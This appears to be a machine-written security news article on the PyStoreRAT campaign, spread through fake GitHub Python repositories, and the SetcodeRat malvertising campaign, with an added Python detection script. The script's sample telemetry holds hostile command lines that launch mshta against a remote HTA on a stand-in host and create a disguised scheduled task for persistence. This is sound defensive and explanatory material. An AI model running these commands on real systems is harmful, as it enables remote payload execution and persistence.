Ethical Hacking News
Cybersecurity Threats on the Rise: A New Era of Malware Campaigns and Supply Chain Attacks
A new campaign is using GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT, highlighting the growing sophistication of modern malware campaigns. This threat serves as a reminder that cybersecurity is an ongoing challenge that requires constant vigilance from individuals and organizations alike.
The PyStoreRAT campaign uses GitHub-hosted Python repositories to distribute a JavaScript-based Remote Access Trojan (RAT). Threat actors are using sophisticated tactics and tools, including public platforms like GitHub, to carry out their nefarious plans. The malware was distributed through loader stubs embedded in repositories masquerading as OSINT tools, DeFi bots, and security-themed utilities. The campaign is part of a growing trend in cybersecurity threats that include supply chain attacks, zero-day vulnerabilities, and evolving malware campaigns. The PyStoreRAT campaign has been linked to a threat actor of likely Eastern European origin, according to Morphisec. The malware features modular, script-based implants that can adapt to security controls and deliver multiple payload formats. Another remote access trojan (RAT) codenamed SetcodeRat is being propagated across China via malvertising lures.
The world of cybersecurity has been abuzz with recent reports of various malicious activities, including a new campaign that leverages GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. This development is part of a growing trend in the cybersecurity landscape, where threat actors are increasingly using sophisticated tactics and tools to carry out their nefarious plans.
In this article, we will delve into the details of the PyStoreRAT campaign and its implications for individuals and organizations alike. We will also explore other recent threats and trends that have emerged in the field of cybersecurity, including supply chain attacks, zero-day vulnerabilities, and the evolving landscape of malware campaigns.
The PyStoreRAT campaign is a striking example of how threat actors are using publicly available platforms like GitHub to spread malware. According to reports, the malware was distributed through Python or JavaScript loader stubs embedded in repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that were designed to appeal to analysts and developers.
The earliest signs of this campaign date back to mid-June 2025, with a steady stream of "repositories" published since then. The tools were promoted via social media platforms like YouTube and X, and their star and fork metrics were artificially inflated, a technique reminiscent of the Stargazers Ghost Network.
The threat actors behind this campaign leveraged either newly created GitHub accounts or accounts that had lain dormant for months to publish the repositories, stealthily slipping the malicious payload in as "maintenance" commits in October and November, after the tools began to gain popularity and landed on GitHub's top trending lists.
In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind this operation was to lend them a veneer of legitimacy by abusing GitHub's inherent trust and deceiving users into executing the loader stub that's responsible for initiating the infection chain.
This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files. The loader stub gathers a list of installed antivirus products and checks it for strings matching "Falcon" or "Reason," likely in an attempt to reduce visibility.
If either string is found, it launches "mshta.exe" by means of "cmd.exe." Otherwise, it proceeds with direct "mshta.exe" execution. Persistence is achieved by setting up a scheduled task that's disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host.
Some of the supported commands include downloading and executing EXE payloads, including Rhadamanthys; downloading and extracting ZIP archives; downloading a malicious DLL and executing it using "rundll32.exe"; fetching raw JavaScript code and executing it dynamically in memory using eval(); downloading and installing MSI packages; spawning a secondary "mshta.exe" process to load additional remote HTA payloads; executing PowerShell commands directly in memory; spreading via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files; and deleting the scheduled task to remove the forensic trail.
The presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, according to Morphisec. "PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats," Yonatan Edri said in his report on the malware.
"The use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain." This warning highlights the growing sophistication of modern malware campaigns and the need for organizations to stay vigilant in their security posture.
The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that's likely being propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month.
"The malicious installation package will first verify the region of the victim," the QiAnXin Threat Intelligence Center said. "If it is not in the Chinese-speaking area, it will automatically exit." The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), or Taiwan (Zh-TW).
In the next stage, an executable named "pnm2png.exe" is launched to sideload "zlib1.dll," which then decrypts the contents of a file called "qt.conf" and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.
It enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run "cmd.exe," set up socket connections, collect system and network connection information, and update itself to a new version. These capabilities highlight the evolving nature of remote access trojans and the importance of staying informed about emerging threats.
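The loader behaviours described above for PyStoreRAT (mshta.exe launched from a script host or via cmd.exe, a remote HTA URL, and an NVIDIA-themed scheduled task) and the pnm2png.exe/zlib1.dll sideload used by SetcodeRat are the kind of process and image-load telemetry a detection engineer would alert on. The following is an added example written for this article, not code from Morphisec or QiAnXin; the Sysmon-style records, paths and example.invalid URL are constructed for illustration.

```python
# Added example: replay the behaviours the article attributes to PyStoreRAT and
# SetcodeRat over constructed, Sysmon-style process-creation and image-load records.
import re

# Constructed sample telemetry; field names loosely follow Sysmon event fields.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\ann\AppData\Local\Programs\Python\python.exe",
     "cmdline": "cmd.exe /c mshta.exe https://example.invalid/u.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta.exe https://example.invalid/u.hta"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'schtasks /create /tn "NVIDIA App SelfUpdate" /tr "mshta https://example.invalid/u.hta" /sc minute /mo 30'},
    {"type": "imageload", "image": r"C:\Users\ann\Downloads\ChromeSetup\pnm2png.exe",
     "loaded": r"C:\Users\ann\Downloads\ChromeSetup\zlib1.dll"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

SCRIPT_HOSTS = ("python.exe", "node.exe", "cmd.exe", "powershell.exe")

def base(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the rule names this event triggers (empty list if benign)."""
    hits = []
    if ev["type"] == "process":
        img, par, cmd = base(ev["image"]), base(ev["parent"]), ev["cmdline"].lower()
        # PyStoreRAT: the loader stub starts mshta.exe directly or through cmd.exe
        if img == "mshta.exe" and par in SCRIPT_HOSTS:
            hits.append("mshta_from_script_host")
        # A remote HTA URL on any mshta command line (including a cmd wrapper)
        if re.search(r"mshta(\.exe)?\s+https?://", cmd):
            hits.append("mshta_remote_hta")
        # Persistence: a scheduled task posing as an NVIDIA updater that runs mshta
        if img == "schtasks.exe" and "/create" in cmd and "nvidia" in cmd and "mshta" in cmd:
            hits.append("schtask_nvidia_lure_mshta")
    elif ev["type"] == "imageload":
        # SetcodeRat: pnm2png.exe sideloading zlib1.dll from a user-writable path
        if (base(ev["image"]) == "pnm2png.exe" and base(ev["loaded"]) == "zlib1.dll"
                and not ev["loaded"].lower().startswith("c:\\windows\\")):
            hits.append("sideload_pnm2png_zlib1")
    return hits

def scan(events):
    """Map each event index to its triggered rules, omitting benign events."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}

if __name__ == "__main__":
    for i, rules in scan(EVENTS).items():
        print(i, rules)
```

In production these checks belong in a SIEM or Sysmon/EDR rule set rather than a script, but the parent-process, command-line and load-path conditions carry over unchanged.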
The increasing sophistication of malware campaigns serves as a reminder that cybersecurity is an ongoing challenge that requires constant vigilance from individuals and organizations alike. As the threat landscape continues to evolve, it's essential for organizations to stay up-to-date with the latest security measures and trends in order to protect themselves against potential attacks.
In conclusion, the recent emergence of PyStoreRAT highlights a new era of malware campaigns and supply chain attacks that are sophisticated, stealthy, and designed to deceive even the most seasoned cybersecurity professionals. By staying informed about emerging threats and taking proactive steps to strengthen their security posture, organizations can better protect themselves against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Cybersecurity-Threats-on-the-Rise-A-New-Era-of-Malware-Campaigns-and-Supply-Chain-Attacks-ehn.shtml
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://hackread.com/pystorerat-rat-malware-github-osint-researchers/
Published: Fri Dec 12 13:26:40 2025 by llama3.2 3B Q4_K_M